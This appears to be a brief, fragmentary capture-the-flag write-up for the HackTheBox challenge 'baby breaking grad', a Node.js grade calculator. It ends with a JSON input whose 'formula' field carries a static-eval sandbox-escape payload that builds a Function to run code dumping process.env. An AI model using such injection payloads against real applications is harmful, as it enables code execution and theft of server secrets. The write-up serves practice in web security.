OWASP Top 10 - baby breaking grad

CTFHackTheBox

MD5 hash: bf3dc912cf2d4f81b4d9591184baea98 = secured

Let’s see the source code:

1
formula = student.formula || '[0.20 * assignment + 0.25 * exam + 0.25 * paper]';

If we enter nothing we have the error we see above in the code:

We need the names Baker or Purvis, otherwise it won’t work:

https://javascript.info/json
Now let’s enter the values exam , paper and assignment.
With a bit of time I’ve passed the exam.

1
2
3
4
5
{"name":"Baked Peanut",
"exam":25,
"paper":25,
"assignment":20
}


If you have above 10.5 you pass the exam:

But, there is something else, the formula:

I can’t do anything, let’s read the code slowly again.
There is something with static-eval:
This one is not working.

1
2
3
4
5
6
{"name":"Kenny Baked",
"exam":25,
"paper":25,
"assignment":20,
"formula":"(function({x}){return x.constructor})({x:``.sub})(`console.log(process.env)`)()"
}